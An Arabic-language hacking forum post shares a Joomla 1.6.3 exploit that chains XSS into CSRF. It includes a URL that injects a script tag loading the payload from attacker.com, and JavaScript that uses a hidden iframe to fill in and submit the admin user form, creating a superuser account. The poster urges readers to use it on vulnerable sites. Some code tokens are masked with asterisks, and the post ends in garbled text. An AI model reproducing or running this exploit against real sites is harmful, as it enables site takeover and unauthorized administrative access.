سلام يا اخوان كيفكم ان شاء الله بالف خير
اليوم جايب لكم اخر الثغرات في الجوملة
كود PHP:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.
***65279;
/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
*/
********.writeln('<****** id="******" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></******>');
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
********.getElementById("******").content********.forms[0].jform_name.value = name;
********.getElementById("******").content********.forms[0].jform_username.value = username;
********.getElementById("******").content********.forms[0].jform_password.value = password;
********.getElementById("******").content********.forms[0].jform_password2.value = password;
********.getElementById("******").content********.forms[0].jform_email.value = email;
********.getElementById("******").content********.forms[0].getElementById("1group_8").checked=true;
********.getElementById("******").content********.getElementsByTagName("a")[11].onclick();
طبق هادا على الموقع المصاب :
index.php?option=com_contact&view=category&catid=2 6&id=36&Itemid=-1
ان شاء الله تكون شغالة
اخوكم الهكر المحشش(Haboubamix) :lol:
Nov eyvhj hg[,lgm